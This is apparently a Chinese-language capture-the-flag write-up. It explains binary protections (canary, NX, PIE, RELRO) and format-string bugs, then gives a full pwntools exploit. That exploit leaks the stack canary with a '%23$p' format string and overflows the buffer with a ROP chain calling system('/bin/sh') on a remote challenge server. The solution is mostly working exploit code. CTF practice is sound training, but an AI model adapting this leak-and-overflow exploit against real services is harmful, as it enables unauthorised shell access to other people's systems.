Morton.dms
首先用gdb(已安装peda)打开文件
用checksec检查可执行文件属性
- CANNARY(栈保护) 即是否在栈中插入了cookie(linux中称为canary
- FORTIFY 防止缓冲区溢出攻击 不常见
- NX(Windows平台上称其为DEP)即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
- PIE(ASLR)地址空间分布随机化
0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址,stack和vdso页面随机化。
2 - 表示在1的基础上增加栈(heap)的随机化。 - RELRO 设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击。RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。
格式化字符串漏洞是因为printf的输出完全由用户控制
一个是通过%p(将参数以十六进制方式打印)来实现任意内存泄露
64位前六个参数位于寄存器,第多少个%p是目的内存则可以通过栈帧进行计算,八位(0x8)为一个%p
再就是通过%n(把输出字符的个数写入到地址中)来实现任意内存写入
栈溢出需要注意的则是由于开启了CANNARY,覆盖是需要注意把canary用原值覆盖
exp的思路是通过printf来泄露canary,然后进行栈溢出覆盖
from pwn import *
system_addr = 0x4006A0
binsh_addr = 0x400B2B
pop_addr = 0x400ab3
context.log_level = 'debug'
p = remote('111.198.29.45',52753)
p.sendline('2')
p.sendline('%23$p')
p.recvuntil('battle \n')
canary = int(p.recvline().strip('\n'),16)
#读取输出,去掉\n并表明读取的是十六进制然后转化为int储存
p.sendline('1')
payload = 'A'*0x88 + p64(canary) + 'A'*0x8 + p64(pop_addr) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()